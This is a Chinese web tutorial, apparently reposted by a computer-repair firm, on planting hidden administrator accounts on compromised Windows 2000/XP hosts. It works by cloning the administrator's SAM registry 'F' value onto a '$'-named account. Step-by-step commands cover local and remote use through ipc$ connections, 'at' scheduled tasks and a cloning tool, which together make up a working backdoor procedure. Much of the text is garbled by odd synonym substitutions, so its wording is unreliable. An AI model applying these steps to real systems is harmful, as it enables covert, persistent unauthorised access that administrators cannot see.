设为主页 | 加入收藏 | 繁體中文

建立隐藏的超级用户

  一、如安在图形界面创建隐蔽的超级用户
  图形界面下适用当地或开3389终端服务的肉鸡上。下面我提到的那位作者说的方法很好,但是较为庞大,还要用到psu.exe(让步伐以体系用户身份运转的步伐),要是在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个步伐。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个步伐,修正键值的权限时在右键中点“权限”来修正。对regedit.exe我想大家都很熟习,但却不克不及对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了体系用户SYSTEM外,其它用户都无权检察到内里的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。如许就可以对SAM键内的信息举行读写了了。具体步聚如下:
  1、假定我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在下令行下或帐户管理器中创建一个帐户:hacker$,这里我在下令行下创建这个帐户
  net user hacker$ 1234 /add
  2、在开端/运转中输入:regedt32.exe并回车来运转regedt32.exe。
  3、点“权限”当前会弹出窗口
  点添加将我登录时的帐户添加到宁静栏内,这里我是以administrator的身份登录的,所以我就将administrator参加,并设置权限为“完全控制"。这里需要阐明一下:最好是添加你登录的帐户或帐户所在的组,切莫修正原有的帐户或组,否则将会带来一系列不须要的题目。等隐蔽超级用户建好以,再来这里将你添加的帐户删除即可。
  4、再点“开端”→“运转”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
  翻开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"
  5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本辨别打这几个导出的文件举行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。
  6、在下令行下实行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
  7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修正好的hacker.reg导入注册表即可
  8、到此,隐蔽的超级用户hacker$已经建好了,然后封闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
  9、注意:隐蔽的超级用户建好后,在帐户管理器看不到hacker$这个用户,在下令行用“net user”下令也看不到,但是超级用户创建当前,就不克不及再改密码了,要是用net user下令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐蔽的超级用户了,并且不克不及删除。
  如安在下令行下远程创建隐蔽的超级用户
  在这里将用at的下令,因为用at孕育发生的筹划使命是以体系身份运转的,所以也用不到psu.exe步伐。为了能够使用at下令,肉鸡必需开有schedule的服务,要是没有开启,可用流光里带的东西netsvc.exe或sc.exe来远程启动,固然其方法也可以,只要能启动schedule服务就行。
  对于下令行方法,你可以接纳各种毗连方法,如用SQLexec毗连MSSQL的1433端口,也可以用telnet服务,只要以你能失掉一个cmdshell,并且有运转at下令的权限就可以。
  1、首先找到一台肉鸡,至于怎样来找那不是我这里所说的话题。这里先假定找到一台超级用户为administrator,密码为12345678的肉鸡,如今我们开端在下令行下远程为它创建隐蔽的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地点改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地点。)
  2、先与肉鸡创建毗连,下令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator
  3、用at下令在肉鸡上创建一个用户(要是at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51
  c:\winnt\system32\net.exe user hacker$ 1234 /add
  创建这个加有$符的用户名,是因为加有$符后,下令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。
  4、同样用at下令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:at \\13.50.97.238 12:55
  c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\
  /e 是regedit.exe的参数,在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\这个键的一定要以\结尾。须要的环境下可以用引号将"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起来。
  5、将肉鸡上的hacker.reg下载到本机上用记事本翻开举行编辑下令为:copy \\13.50.97.238\admin$\system32\hacker.reg
  c:\hacker.reg
  修正的方法图形界中已经介绍过了,这里就不作介绍了。
  6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg
  7、检察肉鸡工夫:net time \\13.50.97.238 然后用at下令将用户hacker$删除:
  at \\13.50.97.238 13:40 net user hacker$ /del
  8、验证hacker$是否删除:用
  net use \\13.50.97.238 /del 断开与肉鸡的毗连。
  net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡毗连,不克不及毗连阐明已删除。
  9、再与肉鸡创建毗连:net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"
  再取得肉鸡工夫,用at下令将拷回肉鸡的hacker1.reg导入肉鸡注册表:
  at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg
  regedit.exe的参数/s是指平静形式。
  10、再验证hacker$是否已创建,方法同下面验证hacker$是否被删除一样。
  11、再验证用户hacker$是否有读、写、删的权限,要是不放心,你还可验证是否能创建其它帐户。
  12、经过11可以判定用户hacker$具有超级用户权限,因为最后我用at下令创建它的工夫是一个普通用户,而如今却具有远程读、写、删的权限。
  三、要是肉鸡没有开3389终端服务,而我又不想用下令行,怎样办?
  这种环境下,你也可以用界面方法来远程为肉鸡创建隐蔽的超级用户。因为regedit.exe、regedt32.exe都有毗连网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机创建和删除帐户。具体步聚与下面介绍的类似,我就不多说了,只它的速率实在是令人难以忍耐。
  但是这里有两个条件:1、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机创建毗连当前,才能用regedit.exe regedt32.exe及帐户管理器与远程主机毗连。
  2、远程主机必需开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。
  四、利用被禁用的帐户创建隐蔽的超级用户:
  我们可以用肉鸡上被克制的用户来创建隐蔽的超组用户.方法如下:
  1.想办法检察有哪些用户被仔细的管理员克制,一般环境下,有些管理员出于宁静思量,通常会将guest禁用,固然了会禁用其它用户。在图形界面下,十分容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在下令行下,我还没有想到好的办法,只能在下令行下用下令:"net user 用户名"一个一个来检察用户是否被禁用。
  2.在这里,我们假定用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆步伐CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会主动被激活了): CA.EXE \\肉鸡ip Administrator 超级用户密码 hacher hacher密码。
  3.要是你如今一个cmdshell,如利用telnet服务或SQLEXEC毗连肉鸡的msSQL的默许端口1433失掉的shell都可以,这时你只要输入下令:
  net user hacker /active:no 如许用户hacker就被禁用了(至多外貌上是如许的),固然你也可以将用户hacher换成其它的被禁用的用户。
  4.这时要是你在图形界面下看帐户管理器中的用户时,会发明用户hacker被禁用了,但事实上是如许的吗?你用这个被禁用的用户毗连一下肉鸡看看是否能连上?用下令:net user \\肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连连续看看。我可以报告大家,颠末我屡次试验,次次都能乐成,并且还是超级用户权限。
  5.要是没有cmdshell怎样办?你可以我下面介绍的at下令来禁用用户hacker;下令格式:at \\肉鸡ip 工夫 net user hacker /active:no
  6.原理:具体的高深的原理我也说不上来,我只能从最简略的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并克制你连续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替换,因此hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以毗连肉鸡,并且还具有超级用户的权限。具体我也说不明确,大家姑且这么理解吧。
  五、注意的几点事变:
  1、隐蔽的超级用户创建当前,在帐户管理器中和下令行下均看不到这个用户,但这个用户却存在。
  2、隐蔽的超级用户创建当前,就不克不及再修正密码了,因为一旦修正密码,这个隐蔽的超级用户就会暴露在帐户管理器中,并且不克不及删除。
  3、如在本机上试验时,最好用体系自带的备份东西先备份好本机的“体系状态”重要是注册表的备份,因为自己做试验时,曾呈现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸亏我有备份,呵呵。SAM键是毕竟体系最敏感的部位。
  4、本方法在2000/XP上测试经过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成紧张后果者,由使用者卖力,自己概不卖力。
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: